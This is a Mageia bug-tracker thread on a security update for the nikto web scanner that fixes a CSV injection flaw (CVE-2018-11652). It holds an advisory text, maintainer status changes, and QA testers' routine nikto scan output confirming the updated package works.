Fedora has issued an advisory today (June 20): https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WP2HP7GAFORSGSAPANE4VPDGGYJT5Q3B/ Mageia 5 and Mageia 6 are also affected.
Status comment: (none) => Patches available from upstream and FedoraWhiteboard: (none) => MGA6TOO
Assigning to the registered maintainer.
Assignee: bugsquad => guillomovitchCC: (none) => marja11
Cauldron: fixed Mageia 6: nikto-2.1.5-9.1.mga6 uploaded in update_testing Mageia 5: EOL
Suggested adivsory: This release fixes CVE-2018-11652 vulnerability (CSV injection via the Server field in an HTTP response header).
Assignee: guillomovitch => qa-bugs
CC: (none) => tmbWhiteboard: MGA6TOO => (none)Version: Cauldron => 6
Thanks Guillaume! Advisory: ======================== Updated nikto package fixes security vulnerability: CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers to inject arbitrary OS commands via the Server field in an HTTP response header, which is directly injected into a CSV report (CVE-2018-11652). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11652 https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WP2HP7GAFORSGSAPANE4VPDGGYJT5Q3B/
MGA6-32 on IBM Thinkpad R50e MATE No installation issues for nikto-2.1.5-9.1.mga6. At CLI: $ nikto -host www.google.com - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 172.217.19.196 + Target Hostname: www.google.com + Target Port: 80 + Start Time: 2018-07-02 16:59:00 (GMT2) --------------------------------------------------------------------------- + Server: gws + Cookie 1P_JAR created without the httponly flag + Cookie NID created without the httponly flag + Uncommon header 'x-xss-protection' found, with contents: 1; mode=block + Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN + Uncommon header 'referrer-policy' found, with contents: no-referrer + No CGI Directories found (use '-C all' to force check all possible dirs) + Server banner has changed from 'gws' to 'sffe' which may suggest a WAF, load balancer or proxy is in place + Uncommon header 'x-content-type-options' found, with contents: nosniff + File/dir '/search/about/' in robots.txt returned a non-forbidden or redirect HTTP code (301) and loads more. Not sure what it all means, but looks sensible.
CC: (none) => herman.viaeneWhiteboard: (none) => MGA6-32-OK
Mageia 6, x86_64 Thanks Herman for taking the lead. Had a look at the PoC at https://www.exploit-db.com/exploits/44899/ which involved installing nginx and nginx-extras. Hit a dead-end there with the extras package and the /etc/nginx/ configuration files appeared to be incomplete. Gave up on trying to inject a command string into a CSV document by scanning the nginx server with nikto. Updated the package and used the command from comment 5. $ nikto -host www.google.com - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 209.85.202.99 + Target Hostname: www.google.com + Target Port: 80 + Start Time: 2018-07-04 23:51:50 (GMT1) --------------------------------------------------------------------------- + Server: gws + Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN + Uncommon header 'x-xss-protection' found, with contents: 1; mode=block + Cookie 1P_JAR created without the httponly flag + Cookie NID created without the httponly flag [....] + "robots.txt" contains 271 entries which should be manually viewed. + Allowed HTTP Methods: GET, HEAD This is similar to the output in comment 5. Looks OK for 64-bits or to put it another way Gort: klaathu barada nikto
CC: (none) => tarazed25
Whiteboard: MGA6-32-OK => MGA6-32-OK MGA6-64-OK
Keywords: (none) => validated_updateCC: (none) => sysadmin-bugs
CC: (none) => davidwhodginsKeywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0310.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED